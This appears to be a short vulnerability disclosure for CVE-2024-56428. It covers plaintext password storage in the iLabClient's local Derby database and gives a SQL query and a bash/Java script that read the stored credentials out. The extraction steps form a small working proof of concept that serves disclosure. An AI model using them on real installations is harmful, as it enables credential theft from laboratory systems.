## https://sploitus.com/exploit?id=296FE72F-F83B-539A-A593-0F7E8A4057C3
CVE-2024-56428
==============
***Cleartext credentials in local database of the iLabClient***
<br>
### Read out the configuration incl. password
The iLabClient is used to download results from the laboratory server. Its configuration data
is stored locally in the Apache Derby instance `iLabClient`, and the password is stored there in plain text. To
read it, a connection to the local database must first be established, for example as described in
[CVE-2024-56429](https://github.com/lisa-2905/CVE-2024-56429).<br>
Read out the passwords:
```
select EINSTELLUNGEN from configs;
```
<br>
### Automated script
The `get_configs.sh` script can be executed to read out the configuration data. It is important that
no other program (e.g. the iLabClient itself) accesses the database during execution.
Explanation of the script:<br>
```
#! /bin/bash
"C:\ilabClient\java8u422\bin\java.exe" -jar ".\derby-lib\derbyrun.jar" ij script_sql.sql
read
```
`"C:\ilabClient\java8u422\bin\java.exe"`: Uses the Java version supplied with the installation of the client. Change
this if the client was installed in a different directory.<br>
`-jar`: Tells Java that a JAR file is to be executed.<br>
`".\derby-lib\derbyrun.jar" ij`: Runs the `ij` tool from Apache Derby.<br>
`script_sql.sql`: Script that reads out the corresponding configurations. Change the path to the database in this file
if the client was installed in a different directory.<br>
------
Discoverer: Lisa Ulbrich (Lufthansa Industry Solutions AS GmbH)